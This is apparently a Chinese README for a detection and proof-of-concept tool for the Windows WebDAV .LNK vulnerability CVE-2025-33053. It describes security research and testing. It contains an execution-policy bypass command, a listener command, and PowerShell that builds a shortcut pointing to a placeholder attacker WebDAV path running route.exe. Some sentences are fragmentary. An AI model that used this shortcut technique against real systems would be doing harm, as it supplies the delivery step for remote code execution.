检查器验证截图
PoC 验证截图
一套完整的工具,用于检查并演示针对 CVE-2025-33053 的潜在利用——这是一项影响 Windows 系统的严重 WebDAV 远程代码执行(RCE)漏洞。
CVE-2025-33053 允许攻击者利用引用恶意远程 WebDAV 共享的 .LNK 快捷方式文件,在受影响系统上可能导致远程代码执行(RCE)。
.LNK 文件)时,必须能够通过 WebDAV 解析 UNC 路径。.LNK 文件或直接访问 UNC 路径——指向类似以下的远程 UNC 路径:.LNK 被访问或手动浏览 UNC 路径(例如通过文件资源管理器)时:
CVE-2025-33053_checker.ps1)| 检查项 | 目的 |
|---|---|
| 🔍 WebClient 服务状态 | 确认 WebDAV 支持是否已启用并正在运行。 |
| 🔍 通过 Test-Path 测试 UNC 路径处理 | 测试系统是否能解析远程 WebDAV UNC 路径(CVE 利用的关键前提条件)。 |
以管理员身份打开 PowerShell。
如果脚本执行受限,请运行:
Set-ExecutionPolicy -Scope Process -ExecutionPolicy Bypass
CVE-2025-33053_PoC.py)python3 CVE-2025-33053_PoC.py --port 8000
\\<Kali-IP>@8000\DavWWWRoot\route.exe
\\<Kali-IP>@8000\DavWWWRoot\route.exe
$WScriptShell = New-Object -ComObject WScript.Shell
$Shortcut = $WScriptShell.CreateShortcut("C:\Users\Public\CVE-2025-33053-Test.lnk")
$Shortcut.TargetPath = "\\<Kali-IP>@8000\DavWWWRoot\route.exe"
$Shortcut.Save()
[!] PROPFIND request received from <victim-ip> - Potential CVE-2025-33053 detected!
[!] Target system is VULNERABLE to CVE-2025-33053!
✔️ 使用真实的 UNC 路径解析——非模拟。 ✔️ 捕获由操作系统触发的实际 PROPFIND 请求——这正是 CVE 利用所需的行为。 ✔️ 在未执行有效载荷或造成破坏的情况下,展示了真实的网络级漏洞证据。
此 PoC 不会利用或危害目标系统——仅检测底层的脆弱行为。 仅用于受控环境或经明确授权的场景。 展示真实的系统行为——非模拟。 仅限教育用途。禁止在未经授权的系统上运行。
MIT 许可证——仅供教育、研究和防御目的免费使用。
欢迎提交拉取请求——改进检测、添加功能或提出修复建议。
本仓库仅供教育和授权的安全研究使用。 严禁将本工具用于您不拥有或未经许可测试的系统。